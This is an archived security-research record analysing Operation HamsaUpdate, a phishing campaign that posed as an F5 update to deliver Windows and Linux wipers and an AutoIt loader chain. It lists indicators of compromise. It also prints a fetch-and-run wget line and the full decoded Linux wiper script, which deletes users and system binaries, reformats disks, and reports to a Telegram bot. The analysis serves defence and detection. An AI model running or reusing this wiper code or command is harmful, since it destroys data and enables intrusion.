{
	"id": "653f7be6-9831-444e-a634-330de185d7d9",
	"created_at": "2026-04-06T00:08:28.599571Z",
	"updated_at": "2026-04-10T13:11:25.240172Z",
	"deleted_at": null,
	"sha1_hash": "869364ef84d5105b33f8f2006e3d047998a7565e",
	"title": "Operation HamsaUpdate: A Sophisticated Campaign Delivering Wipers Puts Israeli Infrastructure at Risk",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2773402,
	"plain_text": "Operation HamsaUpdate: A Sophisticated Campaign Delivering Wipers\r\nPuts Israeli Infrastructure at Risk\r\nBy Research Team\r\nPublished: 2023-12-20 · Archived: 2026-04-02 11:25:21 UTC\r\nWritten by Nicole Fishbein and Ryan Robinson\r\nOn December 19th, the Israel National Cyber Directorate released an urgent alert warning regarding a phishing campaign\r\nactively targeting Israeli customers using F5’s network devices. We’ve labeled this campaign Operation HamsaUpdate. It\r\nfeatures the deployment of a newly developed wiper malware that targets both Windows and Linux servers. The campaign\r\nleverages a convincingly written email in Hebrew and utilizes sophisticated social engineering techniques, pressuring\r\nvictims to execute the harmful code residing on their servers. The final attack delivers a complex, multi-stage loader or a\r\ndestructive wiper, each variant customized for either Linux or Windows environments.\r\nTo help identify and combat this threat, the Israel National Cyber Directorate has made public the Indicators of Compromise\r\n(IOCs) associated with this campaign, including variants of the wiper malware. We’ve dubbed the Windows variant ‘Hatef’\r\nand the Linux variant ‘Hamsa’. During our analysis, we unearthed a second-stage loader coded in Delphi—which\r\nspearheads the execution of an AutoIt injector. This injector has been given the name ‘Handala’.\r\nThe following blog post presents a detailed technical examination of the various threats contained within the Operation\r\nHamsaUpdate.\r\nInfection Vector: Phishing Email\r\nThe attack is initiated with a cleverly crafted phishing email that stands out for its impeccable Hebrew, free of the typical\r\nmisspellings or grammatical errors often seen in such schemes. 
The email’s content showcases a sophisticated level of social\r\nengineering, creating a compelling sense of urgency that is highly persuasive to the recipient.\r\nCentral to the attackers’ strategy is adopting a phishing theme that exploits the recent vulnerability discovery in F5’s BIG-IP\r\nplatform. BIG-IP represents an advanced iteration of Application Delivery Controller (ADC) technology and is integral to\r\nmany organizations’ network infrastructures. The email convincingly warns the victim that this critical vulnerability has led\r\nto a compromise within their organization. It presses the urgency of the matter, imploring the recipient to take immediate\r\naction by adhering to the directives enclosed in the email.\r\nScreenshot of the phishing email published by the Israel National Cyber Directorate.\r\nIn a detailed and deceptive request, the victim is instructed to run a specific file across all their Linux and Windows servers,\r\nexplicitly including backup and even localized servers, ostensibly to address the issue. For Linux servers, the email\r\ncunningly guides the victim in utilizing root privileges to execute a wget command. Meanwhile, Windows server\r\nadministrators are instructed to open and execute an attached archive ZIP file.\r\nBy leveraging a well-known and trusted platform’s vulnerability and employing highly convincing communication, the\r\nattackers demonstrate advanced tactics designed to manipulate their targets into unknowingly compromising their own\r\nnetwork’s security.\r\nHacktivism?\r\nA group calling itself “Handala Hack Team” has claimed responsibility for recent cyber attacks. They present themselves as\r\na newly formed pro-Palestinian activist group, yet their identity behind the social media profiles remains uncertain. Handala\r\nHack has set up various social media accounts, including on Telegram, Tox, Twitter, and BreachForums, and has also\r\nlaunched their own website, which is currently incomplete. 
As they reported the attacks in real-time, they also mocked the\r\nIsrael National Cyber Directorate (INCD). Their website’s purpose is still unclear, but it may be intended for publicizing\r\ninformation about hacked targets.\r\nhttps://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/\r\nPage 1 of 10\n\nHandala Hack Team website.\r\nPosts on social media by Handala Hack Team.\r\nThe group appears to be targeting social media to gain attention for their activist hacking. They have produced a video and\r\nare actively tagging Israeli news agencies, influencers, and figures in the cybersecurity industry. Their posts are being shared\r\non all their social media platforms.\r\nThe video created by Handala Hack Team.\r\nThe group sent an email to Twitter influencer @DailyDarkWeb claiming that they targeted Israeli government entities,\r\ndestroying 10TB of data. No evidence has been provided yet for these claims.\r\nBesides the group’s claims, we can’t make attribution since there is insufficient evidence. Moreover, there’s a known\r\ntactic where false activist personas are crafted to imply that independent activists, rather than government organizations, are\r\nbehind cyberattacks.\r\nTechnical Analysis\r\nThe Loader\r\nFor the Windows variant, there are two known variants of ZIP files that are delivered. Both ZIP files contain only one file,\r\nan exe named F5UPDATER.EXE, which is a .NET application that is disguised as a system update tool of F5. It serves as\r\nthe first stage loader of the attack.\r\nIn both cases, the loader is implemented in C#, using the same namespace called SecureDeleteFiles and defining a class\r\nFrmMain. In both cases, the form includes a progress bar (prgStatus), a picture box (pictureBox1), a label (label1), and a\r\nbutton (btnDeleteAllFiles).\r\nBoth files extract an assembly from the resource section. 
The payload is written to System32 and executed.\r\nThe difference between the two archive variants is the payload in the resource. The loader\r\n(fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2) extracts a resource called Hatef.exe, which is\r\nthe executable for the wiper.\r\nThe second loader variant (ca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a) has two resources.\r\nOne is Hatef.exe, and the other one, which is the one actually extracted, is a resource called Handala.exe written in Delphi. The term\r\nHandala refers to a renowned national emblem and embodiment of the Palestinian people. Before writing the payload, the loader checks whether\r\nthe file already exists in the System32 directory and deletes it if so. In this variant, the wiper Hatef is\r\nnot used.\r\nArchive SHA256 | Type | Loader SHA256\r\n64c5fd791ee369082273b685f724d5916bd4cad756750a5fe953c4005bb5428c | ZIP | ca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a (drops Handala.exe, 454e6d3782f23455875a5db64e1a8cd8eb743400d8c6dadb1cd8fd2ffc2f9567)\r\nad66251d9e8792cf4963b0c97f7ab44c8b68101e36b79abc501bee1807166e8a | ZIP | fe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2\r\nWindows Payload: Hatef Wiper\r\nThe Windows wiper is internally identified by the Persian name “Hatef”. The wiper starts out by retrieving its current\r\nprocess name and checking for other processes with the same name, excluding its own process ID (with guardrails for\r\nmatching session IDs and executable paths). This step functions as a singleton check designed to prevent multiple instances\r\nof the malware from running simultaneously. If there is already a running instance of the wiper, it sets a specific flag, stops\r\nfurther actions, and terminates prematurely.\r\nIf the singleton check succeeds, the Hatef Wiper checks for Administrator privileges. 
If such privileges are missing, the\r\nwiper presents a message box, suggesting it is an updater requiring Administrator access to proceed, a tactic likely intended\r\nto coax the user into granting elevated permissions.\r\nThe program checks if command-line arguments are passed during its initiation. If the command-line argument does not\r\nmatch “ConfirmDeleteFiles”, the wiper cunningly displays a confirmation message box asking for user affirmation\r\nregarding a purported system update, adding another layer to its deceptive facade. Should the user approve, or if the action is\r\nauthorized via the command line, a duplicitous message appears, falsely stating: “The system has been successfully\r\nupdated!”\r\nNext, it spawns a new class instance named Service and invokes its Run method. This is where the wiper’s core logic comes\r\nto life, establishing multiple lists that maintain a record of directories and files spread across various locations on the system,\r\nincluding the Users, Program Files, and Windows directories.\r\nThe program employs a method called OverwriteFileBlockAndDelete to overwrite files with 4096-byte blocks of random\r\ndata and subsequently delete them. It skips files that are part of the malware’s executable process or are located on a\r\nmachine named “HANDALA”. Handala is the name of the resource and the likely name of the developer’s machine. If a file\r\ncannot be overwritten due to an error, its path is earmarked in a secondary list (filesOtherDrives) for later attention.\r\nImplementation of OverwriteFileBlockAndDelete\r\nThe malware wipes key system paths across all connected drives, focusing on directories within “Users,” “Program Files,”\r\n“Program Files (x86),” and “Windows,” employing the ProcessDirectory method to enumerate all files within these paths\r\nrecursively. 
Once files are deleted and directories are left empty, it uses an incorrectly spelled method, DeleteDrirectorys,\r\nto remove these now-obsolete directories.\r\nDuring its operation, the wiper sends periodic updates to a predetermined Telegram chat, likely to inform its controllers\r\nabout the ongoing progress or notify them when the task is completed. The dispatched information comprises the external IP\r\naddress of the infected computer, the hostname, a timestamp, and a count of “Undeleted files” within critical file system\r\nlocations such as the Windows directory and Program Files directories. This count is formatted to show the number of files\r\nthat the malware has not managed to delete up to that point. This communication strategy serves as a means of real-time\r\nreporting on malicious activities, offering the attackers updates and insights into the efficacy of their attack.\r\nAnalysis of Hatef Wiper\r\nLinux Payload: Hamsa Wiper\r\nThe analysis of the downloaded script revealed an obfuscated payload concealed within. The payload, obscured using a\r\nseries of five Base64 encoding steps, is executed using the ‘eval’ command. Upon decoding, it reveals a bash script\r\nengineered to conduct a data-wiping operation. The decoded script is in the IOCs section. Because there are five Base64\r\noperations on that script, we named the wiper Hamsa (five in Arabic).\r\nwget -O - https://sjc1.vultrobjects.com/f5update/update.sh | bash\r\nAfter masquerading as a routine update, the script strategically pauses for 30 minutes. This delay creates a deceptive\r\nappearance of typical system behavior during this period. In the meantime, the script accomplishes reconnaissance to\r\nidentify the Linux distribution in use, whether it be Red Hat, Ubuntu, or Debian. 
Subsequently, it quietly installs necessary\r\ntools, such as xfsprogs, wipe, and parted, which are pivotal for later tasks involving disk partition manipulation and the\r\nsecure erasure of data.\r\nLike its Windows variant, this wiper version transmits data to the same Telegram channel. The shared information aligns\r\nwith what’s sent by the Windows variant but adds specific details, such as the system directory’s drive letter and prepared\r\ninformation on disk space. The data is organized with clear headers and separators to facilitate understanding, forming a\r\nstructured log that allows the attackers to track and assess the impact of their infiltration.\r\nProgressing with malicious intentions, the script enumerates all user accounts with an ID number exceeding 999. It\r\nsystematically eliminates these accounts and obliterates their associated files. This is achieved by harnessing the secure\r\ndeletion capabilities of the wipe command within the users’ home directories.\r\nAdditionally, the script outlines a function called remove_os_file. This function is designed to delete important system files\r\nin key folders like /bin, /sbin, /usr/bin, and /usr/sbin. Interestingly, it does not delete the files for rebooting the system or\r\nremoving files (reboot and rm utilities), which hints that they might be needed for later parts of the process.\r\nNext, the wiper checks the mounted partitions—excluding the root partition—by unmounting them and then initializing a\r\nnew GPT partition table. It generates a new partition, conducts an integrity check via parted, and invokes partprobe to re-read the partition table. Finally, it formats the newly created partition using the XFS file system, obliterating any data\r\nremnants on these partitions.\r\nUpon the successful wiping of the file systems, the script once again utilizes the send_telegram_message function to report\r\nthe completion of the “cleaning process” to its operators via Telegram. 
Lastly, the script invokes the remove_os_file function\r\nto wipe system binaries. Then, it ensures the system’s inability to recover by executing a reboot command to restart the\r\ncompromised machine, leaving it inoperable.\r\nInfrastructure\r\nThe wiper sends reconnaissance information to a Telegram channel. In both the Windows and the Linux variants, the Bot ID\r\nand the Channel ID are identical.\r\nBot Id: 6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA\r\nChannel Id: 6932028002\r\nDelphi Loader: Handala\r\nAs previously noted, one of the loaders unpacks a Delphi second-stage loader named Handala. The core logic of the loader\r\nis within a function known as PixLawsuit. The loader conceals its strings with a simple obfuscation method that involves the\r\nuse of an ADD operation.\r\nOnce initiated, Handala executes an obfuscated script called Closest. Its goal is to detect any active security software that\r\ncould disrupt the attack’s progression and disable it. This is achieved by listing all active tasks and filtering for names of\r\nprocesses typically associated with security applications using the findstr command.\r\ntasklist\r\nfindstr.exe findstr /I \"avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe\"\r\nfindstr /I \"wrsa.exe\"\r\nNext, Handala concatenates the contents of files named Bw, Vessels, Boy, and Conventions into a unified file called\r\nNaples.pif, which is located within a directory it creates for this purpose. Similarly, it concatenates content from files named\r\nBeastiality, Bicycle, and Employee into another single file named ‘k’ within the same folder. 
After this consolidation\r\nprocess, Handala executes the Naples.pif file while supplying ‘k’ as an argument.\r\ncmd.exe 1428 cmd /c mkdir 30828\r\ncmd.exe 792 cmd /c copy /b Bw + Vessels + Boy + Conventions 30828Naples.pif\r\ncmd.exe 2788 cmd /c copy /b Beastiality + Bicycle + Employee 30828k\r\nNaples.pif 30828Naples.pif 30828k\r\nThe file ‘Naples.pif’ is a renamed AutoIt interpreter, further advancing the attack sequence. A .pif (Program Information\r\nFile) extension could be a strategic move to camouflage the file as a shortcut reminiscent of those utilized in older Windows\r\noperating systems.\r\nThe AutoIt loader itself is not a new tool; it has established a reputation for delivering various forms of threats based on the\r\narguments it receives. For this particular attack, the argument fed to it is another obfuscated AutoIt script, indicative of the\r\nlayered complexity within this multifaceted cyber threat.\r\nSHA256 | Type | File Name\r\nf58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3 | AutoIt Interpreter | Naples.pif\r\naae989743dddc84adef90622c657e45e23386488fa79d7fe7cf0863043b8acd4 | Obfuscated AutoIt Script | k\r\nIn this variant, the script is obfuscated and contains redundant function calls and meaningless strings. Each string is\r\nobfuscated through a simple encoding process.\r\nThis decoding process mirrors that of the Delphi loader, with the distinction that it utilizes the SUB operation instead. To\r\ndecode these strings, we must first eliminate the ‘^’ character. Afterward, we decode each number by subtracting the second parameter\r\npassed to the STAFFING function from it (45/5 = 9 in the snippet below, so 107^130^125^110^100 decodes to “byte[”).\r\n$testamentquartermechanicsmechanical = DllStructCreate(STAFFING(\"107^130^125^110^100\",45/5) \u0026 BinaryLen($ProminentTechrep\r\nSnippet of the decoded AutoIt script.
\r\nUpon execution, the script’s primary task is to inject a piece of shellcode that implements the RC4 stream cipher. This\r\nshellcode’s purpose is singular – to decrypt another payload.\r\nRC4 shellcode used to decrypt payload.\r\nOnce decrypted, the payload is decompressed with RtlDecompressFragment using the LZNT1 algorithm. The product\r\nname and description based on exif information is FlashDevelop, and we will refer to it by this name. The purpose of\r\nFlashDevelop is to unpack and execute more shellcode into dialer.exe and dllhost.exe. The code injected into dllhost\r\ncommunicates with a C2 server over HTTPS at 31.192.237[.]207:2515. The geolocation of the IP is in Chelyabinsk, Russia.\r\nNext, the code is injected into a Windows Media Player process. The executable used varies each time (wmpshare.exe,\r\nwmpenc.exe, wmlaunch.exe etc.).\r\nProcess Hacker during the shellcode execution.\r\nThe Handala loader initiates a complex sequence involving a series of additional loaders, which encompass obfuscated\r\nscripts and shellcode. Although the ultimate objective of this orchestrated execution chain remains ambiguous, it clearly\r\nindicates a more intricate effort to compromise the target machine.\r\nSHA256 | Type\r\n336167b8c5cfc5cd330502e7aa515cc133656e12cbedb4b41ebbf847347b2767 | Win32 EXE (FlashDevelop)\r\nConclusions\r\nThe Hamsa Wiper campaign represents a sophisticated and highly targeted attack on Israeli infrastructure. Using\r\nmeticulously written emails in Hebrew, attackers have wielded advanced social engineering techniques to deliver a multi-faceted malware package, ultimately wiping data across Windows and Linux servers.\r\nOur analysis highlighted key components of the malware, such as the intricate multi-stage loading process involving\r\nobfuscated scripts, the Delphi-coded second-stage loader, and the Handala AutoIt injector. 
By utilizing this complex chain,\r\nthe malware bypassed traditional security measures, resulting in a robust and effective cyber attack.\r\nIOCs\r\n31.192.237[.]207:2515\r\nhttps://sjc1.vultrobjects.com/f5update/update[.]sh\r\nSHA256 | Type | Filename | Signed?\r\nfe07dca68f288a4f6d7cbd34d79bb70bc309635876298d4fde33c25277e30bd2 | Windows Executable (.NET) | F5UPDATER.exe | Yes (signature: F5UPD)\r\nca9bf13897af109cb354f2629c10803966eb757ee4b2e468abc04e7681d0d74a | Windows Executable (.NET) | F5UPDATER.exe | Yes (signature: F5UPD)\r\ne28085e8d64bb737721b1a1d494f177e571c47aab7c9507dba38253f6183af35 | Windows Executable (.NET) | Hatef.exe | No\r\n454e6d3782f23455875a5db64e1a8cd8eb743400d8c6dadb1cd8fd2ffc2f9567 | Windows Executable (Delphi) | Handala.exe | No\r\n6f79c0e0e1aab63c3aba0b781e0e46c95b5798b2d4f7b6ecac474b5c40b840ad | Encrypted bash script | update.sh | –\r\nad66251d9e8792cf4963b0c97f7ab44c8b68101e36b79abc501bee1807166e8a | ZIP | –\r\n64c5fd791ee369082273b685f724d5916bd4cad756750a5fe953c4005bb5428c | ZIP | –\r\n336167b8c5cfc5cd330502e7aa515cc133656e12cbedb4b41ebbf847347b2767 | Windows Executable | FlashDevelop | No\r\nf58d3a4b2f3f7f10815c24586fae91964eeed830369e7e0701b43895b0cefbd3 | AutoIt Interpreter | Naples.pif | No\r\naae989743dddc84adef90622c657e45e23386488fa79d7fe7cf0863043b8acd4 | Obfuscated AutoIt Script | k | No\r\n8f69c9bb80b210466b887d2b16c68600\r\n8bdd1cb717aa2bd03c12c8b4c9df2d94\r\nDecoded update.sh script – Linux Wiper Version:\r\n#!/bin/bash\r\necho 
\"\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n********************************,,,,,,,,,,,,,,,,,*******************************\r\n************************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,***********************\r\n********************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*******************\r\n****************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,***************\r\n*************,,,,,,,,,,,,,,\u0026@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,************\r\n***********,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@*,,,,,@@@@@@@@@@@@@@*,,,,,,**********\r\n********,,,,,,,,,@@@@@@@@@@,,,,,,,,,@@@@@@@@,,,,@@@@@@@@@@@@@@@@@@@@@@@@********\r\n*******,,,,,,,@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,*@@@@@@@@@@@@@@@@@@@@@@@@@,******\r\n*****,,,,,,,/@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@,,,****\r\n****,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,@@@@@,,,,,,,,,,,,,,,,,,,/@,,,,,***\r\n***,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,**\r\n**,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,@@@@@@@@\u0026,,,,,,,,,,,,,,,,,,,,,,,,,,*\r\n*,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,*\r\n*,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,*@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,,,,\r\n*,,,,,,,,,@@@@@@@@@@@@@@@*,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,,,\r\n,,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,,,\r\n,,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,,\r\n*,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@,,,\r\n*,,,,,,,,,@@@@@@@@@@@@@@@*,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@@@@@@@,,,\r\n*,,,,,,,,,@@@@@@@@@@@@@@@(,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@@@@@@@,,,\r\n**,,,,,,,,(@@@@@@@@@@@@@@#,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,(@@@@@@@@@@@@@,,*\r\n***,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,@@@@@@@@@@@\u0026,**\r\n****,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,,,@@@@,,,,
,,,,,,,,,,,,,,,,,,,@@@@@@@@@@,***\r\n*****,,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,@@@@@@@@,,,,,,,,,,,,,,,,,,,,,@@@@@@@@*,****\r\n******,,,,,@@@@@@@@@@@@@@@,,,,,,,,,,,@@@@@@@@@@,,,,,,,,,,,,,,,,,,@@@@@@@@,******\r\n*********#@@@@@@@@@@@@@@@@,,,,,,,,,,,,\u0026@@@@@@@@@@,,,,,,,,,,,,,,@@@@@@@,,,*******\r\n**********@@@@@@@@@@@@@@@@@@@@@@@(,,,,,*@@@@@@@@@@@@@@%//%@@@@@@@@,,,,,*********\r\n*************,,,,,,,,,,,,,,*\u0026@@@@@@,,,,,,,,,,@@@@@@@@@@@@@@@,,,,,,,,************\r\n***************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,*********,****\r\n*******************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,***********,,*,***\r\n***********************,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,***************,,*****\r\n******************************,,,,,,,,,,,,,,,,,,,,,*****************************\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n@@@,,@/,,@@@@,,@@@@@@@@#,,@,,@@@@@,,@@,,@@@@@,,@@,,@@@@@,,@@@@@@,,@@@@@@,,,@,,@@\r\n@@@,,,,,@@@@@,,,,,@@@@@,,@@@@@@@@@,,@@,,@@@@@,,,,,,@@@@@,,@@@@@@,,@@@@@@@@,,@@@@\r\n@@,,,@,,,@@@@,,,,,,@@@@@,,@,,@@@@@,,,@,,@@@@@,,@@,,@@@@@,,@@@@@@,,@@@@@@@@,,@@@@\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@\r\n@@@@@\u0026\u0026@@@\u0026@@@@@\u0026\u0026\u0026\u0026@@@@@@@\u0026\u0026\u0026@@@@@@@@@@\u0026\u0026@@@@@@@\u0026\u0026\u0026\u0026\u0026@@@@@\u0026\u0026\u0026\u0026\u0026@@@@@\u0026\u0026\u0026\u0026@@@@@@@\r\n@@@@@,,@@@,@@@@@,,@@@,,@@@@,,@@(,,@@@@@#,,,@@@@@@@@,@@@@@@@,,@@@@@@@@,,@@@,,@@@@\r\n@@@@@,,@@@,@@@@@,,,,,@@@@@@,,@@@,,@@@@@,,,,,@@@@@@@,@@@@@@@,,@@@@@@@@,,,,,@@@@@@\r\n@@@@@@,,,,,@@@@@,,@@@@@@@@@,,,,,,@@@@@,%@@@,,@@@@@@,@@@@@@@,,,,,@@@@@,,@@,,@@@@@\r\n \"\r\nfor ((i=0; i\u003c30; i++))\r\ndo\r\n echo -n \"#\"\r\n sleep 1\r\ndone\r\necho \"\"\r\nsleep 25\r\necho \"The system has been 
updated successfully!\"\r\n(\r\nsleep 1800\r\necho \"The final update is being applied...\"\r\nif [[ -f /etc/redhat-release ]]; then\r\n sudo yum install xfsprogs wipe parted -y \u003e /dev/null 2\u003e\u00261\r\nelif [[ \"$(lsb_release -is)\" == \"Ubuntu\" ]]; then\r\n sudo apt update\r\n sudo apt install xfsprogs wipe parted -y \u003e /dev/null 2\u003e\u00261\r\nelif [[ \"$(lsb_release -is)\" == \"Debian\" ]]; then\r\n sudo apt update\r\n sudo apt install xfsprogs wipe parted -y \u003e /dev/null 2\u003e\u00261\r\nelse\r\n echo \"Unsupported OS.\"\r\n exit 1\r\nfi\r\ntelegram_bot_token=\"6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA\"\r\ntelegram_chat_id=\"6932028002\"\r\nsend_telegram_message() {\r\n IFS= read -r -d '' message \u003c\u003c EOF\r\nCleaning process started on server HOST: $(hostname)\r\nIP: $(hostname -I)\r\nDisk volumes:\r\n$(df -h --output=source,size,target)\r\nEOF\r\n curl -s --retry 3 --retry-delay 5 -X POST \"https://api.telegram.org/bot$telegram_bot_token/sendMessage\"\r\n -d \"chat_id=$telegram_chat_id\"\r\n -d \"text=$message\"\r\n -H \"Content-Type: application/x-www-form-urlencoded\"\r\n}\r\nsend_telegram_message \u003e /dev/null 2\u003e\u00261\r\nremove_all_users() {\r\nfor username in `awk -F: '$3 \u003e 999 {print $1}' /etc/passwd`\r\n do\r\n deluser --remove-all-files -q $username \u003e /dev/null 2\u003e\u00261\r\n userdel -r $username \u003e /dev/null 2\u003e\u00261\r\n wipe -rfi /home/$username/* \u003e /dev/null 2\u003e\u00261\r\n done\r\n}\r\n##########################################################################################\r\nremove_os_file() {\r\n reboot_path=`which reboot`\r\n rm_path=`which rm`\r\nfor file in /bin/* /sbin/* /usr/bin/* /usr/sbin/*; do\r\n if [[ \"$file\" != \"$reboot_path\" \u0026\u0026 \"$file\" != \"$rm_path\" ]]; then\r\n if [[ \"$file\" != \"$reboot_path\" \u0026\u0026 \"$file\" != \"$rm_path\" ]]; then\r\n
rm -f $file \u003e /dev/null 2\u003e\u00261\r\n fi\r\n fi\r\ndone\r\n}\r\n#########################################################################################\r\nremove_file_system() {\r\nmounted_partitions=$(df -h | awk '{if (NR\u003e1) print $6}')\r\nroot_partition=\"/\"\r\nfs_type=\"xfs\"\r\nstart=\"0%\"\r\nend=\"100%\"\r\nfor partition in $mounted_partitions\r\ndo\r\n \r\n if [[ $partition != $root_partition ]]; then\r\n device_name=`mount | grep $partition |awk '{print $1}'`\r\n if [[ $device_name == /dev* ]]; then\r\n echo $device_name\r\n umount -lv $partition \u003e /dev/null 2\u003e\u00261\r\n parted -s $device_name mklabel gpt -- \u003e /dev/null 2\u003e\u00261\r\n \r\n parted -s $device_name mkpart primary $fs_type $start $end -- \u003e /dev/null 2\u003e\u00261\r\n \r\n parted -s $device_name ignore-optimization check \u003e /dev/null 2\u003e\u00261\r\n partprobe $device_name \u003e /dev/null 2\u003e\u00261\r\n # Format the new partition\r\n mkfs.$fs_type -f ${device_name} \u003e /dev/null 2\u003e\u00261\r\n fi\r\n fi\r\ndone\r\n}\r\n###############################################################################################\r\nremove_all_users\r\nremove_file_system\r\nsend_telegram_message() {\r\n IFS= read -r -d '' message \u003c\u003c EOF\r\nCleaning process completed on server HOST: $(hostname)\r\nIP: $(hostname -I)\r\nDisk volumes:\r\n$(df -h --output=source,size,target)\r\nEOF\r\n curl -s --retry 3 --retry-delay 5 -X POST \"https://api.telegram.org/bot$telegram_bot_token/sendMessage\"\r\n -d \"chat_id=$telegram_chat_id\"\r\n -d \"text=$message\"\r\n -H \"Content-Type: application/x-www-form-urlencoded\"\r\n}\r\nsend_telegram_message \u003e /dev/null 2\u003e\u00261\r\nremove_os_file\r\nreboot\r\n) \u0026\r\nSource: https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MISPGALAXY",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://intezer.com/blog/research/stealth-wiper-israeli-infrastructure/"
	],
	"report_names": [
		"stealth-wiper-israeli-infrastructure"
	],
	"threat_actors": [
		{
			"id": "d0fef355-9eb9-4adc-8d90-a8c7494c4a81",
			"created_at": "2024-01-18T02:02:34.735032Z",
			"updated_at": "2026-04-10T02:00:05.011663Z",
			"deleted_at": null,
			"main_name": "Handala Hack Team",
			"aliases": [
				"Operation HamsaUpdate"
			],
			"source_name": "ETDA:Handala Hack Team",
			"tools": [
				"Hamsa Wiper",
				"Handala",
				"Hatef Wiper"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "4134675e-5b72-4b50-8d70-1a8f18aafbb4",
			"created_at": "2024-10-04T02:00:04.766263Z",
			"updated_at": "2026-04-10T02:00:03.715945Z",
			"deleted_at": null,
			"main_name": "Handala",
			"aliases": [],
			"source_name": "MISPGALAXY:Handala",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b3ebf51d-8f64-48a9-bbfb-674db872cccb",
			"created_at": "2025-08-07T02:03:24.769383Z",
			"updated_at": "2026-04-10T02:00:03.860954Z",
			"deleted_at": null,
			"main_name": "COBALT MYSTIQUE",
			"aliases": [
				"Banished Kitten ",
				"DEV-0842 ",
				"Druidfly ",
				"Handala Hack Team",
				"Homeland Justice",
				"Karmabelow80",
				"Red Sandstorm ",
				"Storm-0842 ",
				"Void Manticore "
			],
			"source_name": "Secureworks:COBALT MYSTIQUE",
			"tools": [
				"AllinOneNeo",
				"Bibi",
				"GramPy",
				"GramPyLoader"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434108,
	"ts_updated_at": 1775826685,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/869364ef84d5105b33f8f2006e3d047998a7565e.pdf",
		"text": "https://archive.orkl.eu/869364ef84d5105b33f8f2006e3d047998a7565e.txt",
		"img": "https://archive.orkl.eu/869364ef84d5105b33f8f2006e3d047998a7565e.jpg"
	}
}